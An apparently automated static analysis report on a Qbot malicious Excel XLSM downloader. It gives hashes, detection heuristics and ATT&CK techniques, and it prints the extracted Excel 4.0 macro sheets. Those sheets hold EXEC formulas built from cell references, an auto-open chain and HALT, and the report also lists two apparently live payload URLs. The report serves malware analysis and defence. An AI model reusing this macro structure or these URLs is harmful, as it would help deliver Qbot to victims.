Qbot — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 03bcc41875b96d1e…

MALICIOUS

Office (OOXML) / .XLSM

166.6 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 14.0300
MD5: 3d2925a91758a074901c942b41100085 SHA-1: 1d19198a3f8370d7481ed3503b5f448c278fbd07 SHA-256: 03bcc41875b96d1e6261bc8caeb9aa7ae92736fc4617d8c7bd22d8846889b9c3
262 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel macro-enabled spreadsheet (XLSM) containing Excel 4.0 macros. Heuristics indicate the use of dangerous XLM formula APIs like EXEC, which are commonly used to download and execute payloads. The embedded URLs and the specific EXEC formula strongly suggest this file acts as a downloader for a second-stage payload, consistent with Qbot activity.

Heuristics 6

  • ClamAV: Xls.Downloader.Qbot0421-9856653-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Qbot0421-9856653-0
  • Excel 4.0 macro sheet (4 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: EXEC, FORMULA, CALL, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://yohsinsolutions.com/0QeH3HFbNyY/kk.html In document text (OOXML body / shared strings)
    • https://gtec24.com/0mqp0yN6/kk.htmlIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml
3053dafa2d3f987ce513cbeee21a23bb155656d1a3bacf27e3c9fd23a98df2cd		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml 1245 bytes
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AL18:AO18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="36" width="4.42578125" style="4"/><col min="37" max="37" width="4.42578125" style="4" customWidth="1"/><col min="38" max="41" width="4.42578125" style="4" hidden="1" customWidth="1"/><col min="42" max="16384" width="4.42578125" style="4"/></cols><sheetData><row r="18" spans="38:41" x14ac:dyDescent="0.25"><c r="AL18" s="4" t="s"><v>26</v></c><c r="AO18" s="3" t="b"><f>EXEC(Sheet2!AM34&amp;AL18&amp;Sheet2!AJ32)=Sheet5!AE8()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><drawing r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml
7c70a733295093fa9be986f7921d4989b1ff5b1c9e7d7c0416a4b8d6aa837808		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml 204903 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A1:BV283"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="38" width="4.5703125" style="4"/><col min="39" max="40" width="4.5703125" style="4" customWidth="1"/><col min="41" max="48" width="4.5703125" style="4" hidden="1" customWidth="1"/><col min="49" max="16384" width="4.5703125" style="4"/></cols><sheetData><row r="1" spans="1:41" x14ac:dyDescent="0.25"><c r="A1" s="3"/><c r="B1" s="3"/><c r="C1" s="3"/><c r="D1" s="3"/><c r="E1" s="3"/><c r="F1" s="3"/><c r="G1" s="3"/><c r="H1" s="3"/><c r="I1" s="3"/><c r="J1" s="3"/><c r="K1" s="3"/><c r="L1" s="3"/><c r="M1" s="3"/><c r="N1" s="3"/><c r="O1" s="3"/><c r="P1" s="3"/><c r="Q1" s="3"/><c r="R1" s="3"/><c r="S1" s="3"/><c r="T1" s="3"/><c r="U1" s="3"/><c r="V1" s="3"/><c r="W1" s="3"/><c r="X1" s="3"/><c r="Y1" s="3"/><c r="Z1" s="3"/><c r="AA1" s="3"/><c r="AB1" s="3"/><c r="AC1" s="3"/><c r="AD1" s="3"/><c r="AE1" s="3"/><c r="AF1" s="3"/><c r="AG1" s="3"/><c r="AH1" s="3"/><c r="AI1" s="3"/><c r="AJ1" s="3"/></row><row r="2" spans="1:41" x14ac:dyDescent="0.25"><c r="A2" s="3"/><c r="B2" s="3"/><c r="C2" s="3"/><c r="D2" s="3"/><c r="E2" s="3"/><c r="F2" s="3"/><c r="G2" s="3"/><c r="H2" s="3"/><c r="I2" s="3"/><c r="J2" s="3"/><c r="K2" s="3"/><c r="L2" s="3"/><c r="M2" s="3"/><c r="N2" s="3"/><c r="O2" s="3"/><c r="P2" s="3"/><c r="Q2" s="3"/><c r="R2" s="3"/><c r="S2" s="3"/><c r="T2" s="3"/><c r="U2" s="3"/><c r="V2" s="3"/><c r="W2" s="3"/><c r="X2" s="3"/><c r="Y2" s="3"/><c r="Z2" s="3"/><c r="AA2" s="3"/><c r="AB2" s="3"/><c r="AC2" s="3"/><c r="AD2" s="3"/><c r="AE2" s="3"/><c r="AF2" s="3"/><c r="AG2" s="3"/><c r="AH2" s="3"/><c r="AI2" s="3"/><c r="AJ2" s="3"/></row><row r="3" spans="1:41" x14ac:dyDescent="0.25"><c r="A3" s="3"/><c r="B3" s="3"/><c r="C3" s="3"/><c r="D3" s="3"/><c r="E3" s="3"/><c r="F3" s="3"/><c r="G3" s="3"/><c r="H3" s="3"/><c r="I3" s="3"/><c r="J3" s="3"/><c r="K3" s="3"/><c r="L3" s="3"/><c r="M3" s="3"/><c r="N3" s="3"/><c r="O3" s="3"/><c r="P3" s="3"/><c r="Q3" s="3"/><c r="R3" s="3"/><c r="S3" s="3"/><c r="T3" s="3"/><c r="U3" s="3"/><c r="V3" s="3"/><c r="W3" s="3"/><c r="X3" s="3"/><c r="Y3" s="3"/><c r="Z3" s="3"/><c r="AA3" s="3"/><c r="AB3" s="3"/><c r="AC3" s="3"/><c r="AD3" s="3"/><c r="AE3" s="3"/><c r="AF3" s="3"/><c r="AG3" s="3"/></row><row r="4" spans="1:41" x14ac:dyDescent="0.25"><c r="A4" s="3"/><c r="B4" s="3"/><c r="C4" s="3"/><c r="D4" s="3"/><c r="E4" s="3"/><c r="F4" s="3"/><c r="G4" s="3"/><c r="H4" s="3"/><c r="I4" s="3"/><c r="J4" s="3"/><c r="K4" s="3"/><c r="L4" s="3"/><c r="M4" s="3"/><c r="N4" s="3"/><c r="O4" s="3"/><c r="P4" s="3"/><c r="Q4" s="3"/><c r="R4" s="3"/><c r="S4" s="3"/><c r="T4" s="3"/><c r="U4" s="3"/><c r="V4" s="3"/><c r="W4" s="3"/><c r="X4" s="3"/><c r="Y4" s="3"/><c r="Z4" s="3"/><c r="AA4" s="3"/><c r="AB4" s="3"/><c r="AC4" s="3"/><c r="AD4" s="3"/><c r="AE4" s="3"/><c r="AF4" s="3"/><c r="AG4" s="3"/></row><row r="5" spans="1:41" x14ac:dyDescent="0.25"><c r="A5" s="3"/><c r="B5" s="3"/><c r="C5" s="3"/><c r="D5" s="3"/><c r="E5" s="3"/><c r="F5" s="3"/><c r="G5" s="3"/><c r="H5" s="3"/><c r="I5" s="3"/><c r="J5" s="3"/><c r="K5" s="3"/><c r="L5" s="3"/><c r="M5" s="3"/><c r="N5" s="3"/><c r="O5" s="3"/><c r="P5" s="3"/><c r="Q5" s="3"/><c r="R5" s="3"/><c r="S5" s="3"/><c r="T5" s="3"/><c r="U5" s="3"/><c r="V5" s="3"/><c r="W5" s="3"/><c r="X5" s="3"/><c r="Y5" s="3"/><c r="Z5" s="3"/><c r="AA5" s="3"/><c r="AB5" s="3"/><c r="AC5" s="3"/><c r="AD5" s="3"/><c r="AE5"
... (truncated)
xlm_sheet_02.xml
6cb3ab47226c206f666f8830fc35f10e422712c9d53bd66c647d57a05f0b41bc		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml 4485 bytes
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="L13:AM37"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="32" width="4.42578125" style="4"/><col min="33" max="39" width="4.42578125" style="4" hidden="1" customWidth="1"/><col min="40" max="16384" width="4.42578125" style="4"/></cols><sheetData><row r="13" spans="33:39" x14ac:dyDescent="0.25"><c r="AG13" s="4" t="s"><v>25</v></c><c r="AI13" s="3" t="b"><f>654984654984+1694894654=EXEC(Sheet2!AM34&amp;AG13&amp;Sheet2!AJ32)</f><v>0</v></c></row><row r="14" spans="33:39" x14ac:dyDescent="0.25"><c r="AK14" s="3" t="s"><v>4</v></c><c r="AL14" s="3" t="s"><v>5</v></c><c r="AM14" s="4" t="s"><v>6</v></c></row><row r="15" spans="33:39" x14ac:dyDescent="0.25"><c r="AI15" s="3" t="b"><f>Sheet4!AO14()</f><v>0</v></c><c r="AK15" s="3" t="s"><v>0</v></c><c r="AL15" s="3" t="s"><v>5</v></c><c r="AM15" s="4" t="s"><v>7</v></c></row><row r="16" spans="33:39" x14ac:dyDescent="0.25"><c r="AI16" s="3"/><c r="AK16" s="3" t="s"><v>1</v></c><c r="AL16" s="3" t="s"><v>8</v></c><c r="AM16" s="4" t="s"><v>7</v></c></row><row r="17" spans="12:39" x14ac:dyDescent="0.25"><c r="AI17" s="3"/><c r="AK17" s="3" t="s"><v>9</v></c><c r="AL17" s="3" t="s"><v>8</v></c><c r="AM17" s="4" t="s"><v>0</v></c></row><row r="18" spans="12:39" x14ac:dyDescent="0.25"><c r="AI18" s="3"/><c r="AK18" s="3" t="s"><v>3</v></c><c r="AL18" s="3" t="s"><v>10</v></c><c r="AM18" s="4" t="s"><v>11</v></c></row><row r="19" spans="12:39" x14ac:dyDescent="0.25"><c r="AK19" s="3" t="s"><v>12</v></c><c r="AL19" s="3" t="s"><v>10</v></c><c r="AM19" s="4" t="s"><v>13</v></c></row><row r="20" spans="12:39" x14ac:dyDescent="0.25"><c r="AK20" s="3" t="s"><v>14</v></c><c r="AL20" s="3"/><c r="AM20" s="4" t="s"><v>15</v></c></row><row r="21" spans="12:39" x14ac:dyDescent="0.25"><c r="AK21" s="3" t="s"><v>7</v></c><c r="AL21" s="3"/><c r="AM21" s="4" t="s"><v>16</v></c></row><row r="22" spans="12:39" x14ac:dyDescent="0.25"><c r="AK22" s="3" t="s"><v>3</v></c><c r="AL22" s="3"/><c r="AM22" s="4" t="s"><v>17</v></c></row><row r="23" spans="12:39" x14ac:dyDescent="0.25"><c r="AK23" s="3" t="s"><v>18</v></c><c r="AL23" s="3"/><c r="AM23" s="4" t="s"><v>11</v></c></row><row r="24" spans="12:39" x14ac:dyDescent="0.25"><c r="AK24" s="3" t="s"><v>19</v></c><c r="AL24" s="3"><v>0</v></c><c r="AM24" s="4" t="s"><v>20</v></c></row><row r="25" spans="12:39" x14ac:dyDescent="0.25"><c r="AK25" s="3" t="s"><v>21</v></c><c r="AL25" s="3"/><c r="AM25" s="4" t="s"><v>22</v></c></row><row r="26" spans="12:39" x14ac:dyDescent="0.25"><c r="AK26" s="3" t="s"><v>3</v></c><c r="AL26" s="3"/><c r="AM26" s="4" t="s"><v>11</v></c></row><row r="27" spans="12:39" x14ac:dyDescent="0.25"><c r="L27" s="3"/><c r="AK27" s="3" t="s"><v>23</v></c><c r="AL27" s="3"/><c r="AM27" s="4" t="s"><v>20</v></c></row><row r="28" spans="12:39" x14ac:dyDescent="0.25"><c r="L28" s="3"/><c r="AK28" s="3" t="s"><v>15</v></c><c r="AL28" s="3"/><c r="AM28" s="4" t="s"><v>24</v></c></row><row r="29" spans="12:39" x14ac:dyDescent="0.25"><c r="L29" s="3"/><c r="AK29" s="3" t="s"><v>7</v></c><c r="AL29" s="3"/><c r="AM29" s="4" t="s"><v>20</v></c></row><row r="30" spans="12:39" x14ac:dyDescent="0.25"><c r="L30" s="3"/><c r="AK30" s="3" t="s"><v>11</v></c><c r="AL30" s="3"/></row><row r="31" spans="12:39" x14ac:dyDescent="0.25"><c r="L31" s="3"/></row><row r="32" spans="12:39" x14ac:dyDescent="0.25"><c r="L32" s="3"/></row><row r="33" spans="12:12" x14ac:dyDescent="0.25"><c r="L33" s="3"/></row><row r="34" spans="12:12" x14ac:dyDescent
... (truncated)
xlm_sheet_03.xml
95eb9ac669583f7114c029725ae2ac1b158fd43ff181b1370db5057cd2dc1558		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml 1082 bytes
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AE9"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="30" width="4.42578125" style="4"/><col min="31" max="31" width="4.42578125" style="4" hidden="1" customWidth="1"/><col min="32" max="16384" width="4.42578125" style="4"/></cols><sheetData><row r="9" spans="31:31" x14ac:dyDescent="0.25"><c r="AE9" s="3" t="b"><f>HALT()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><drawing r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.